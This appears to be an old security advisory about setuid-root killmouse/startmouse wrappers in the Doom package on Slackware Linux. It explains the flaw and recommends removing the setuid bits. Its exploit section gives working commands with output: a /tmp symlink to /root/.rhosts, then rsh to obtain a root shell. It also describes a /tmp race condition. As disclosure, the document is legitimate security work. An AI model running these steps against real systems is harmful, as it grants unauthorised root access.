System: Probably Linux specific. Slackware 3.0 (installs Linux 1.2.13) which have gpm utility and/or the Doom package installed are vulnerable. Other distributions might be too. Impact: Local users can acquire root status. Background: The problem is the killmouse/startmouse command that is part of Doom package on Linux systems. It is actually a C-wrapper that runs two scripts (killmouse.sh/startmouse.sh). It runs suid root. /usr/games/doom/startmouse.sh: #!/bin/sh if [ -r /tmp/gpmkilled ]; then /usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript /bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled fi /usr/games/doom/killmouse.sh: #!/bin/sh if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled fi Problem: I would try to describe the problem but I can't stop laughing. Exploit: This can be exploited in a few similar ways. Here's just one. Let's assume the gpm utility is not running. We can't start it up ourselves as gpm is only to be run by root. So we'll use startmouse to fire it up: $ touch /tmp/gpmkilled $ /usr/games/doom/startmouse ps -aux | grep gpm bo 1436 0.0 2.0 40 312 v03 R 16:33 0:00 grep gpm root 1407 0.0 2.4 42 368 ? S 16:24 0:00 /usr/bin/gpm t ms Fine, it's running. Now we'll use killmouse to kill the process, but first we set our umask to 0 and link /tmp/gpmkilled to /root/.rhosts: $ umask 0 $ ln -s /root/.rhosts /tmp/gpmkilled $ /usr/games/doom/killmouse 1407 ? S 0:00 gpm t ms $ ls -l /root/.rhosts -rw-rw-rw- 1 root users 0 Dec 13 16:44 /root/.rhosts $ echo localhost bo > /root/.rhosts $ rsh -l root localhost sh -i bash# Bingo. On some systems gpm might not be started in /etc/rc.d/rc.local so the startmouse script will fail. But gpm might be running already. If neither of these conditions are met, note that startmouse.sh creates /tmp/gpmscript and runs it in a shell. There's a window of time between creating the script and executing it, so we have a nice race condition here; it can be replaced with anything you like prior to execution. Solution: Remove setuid bits of killmouse/startmouse. Better yet - nuke them. While your at it, nuke Doom too - it's a stupid game anyway :-)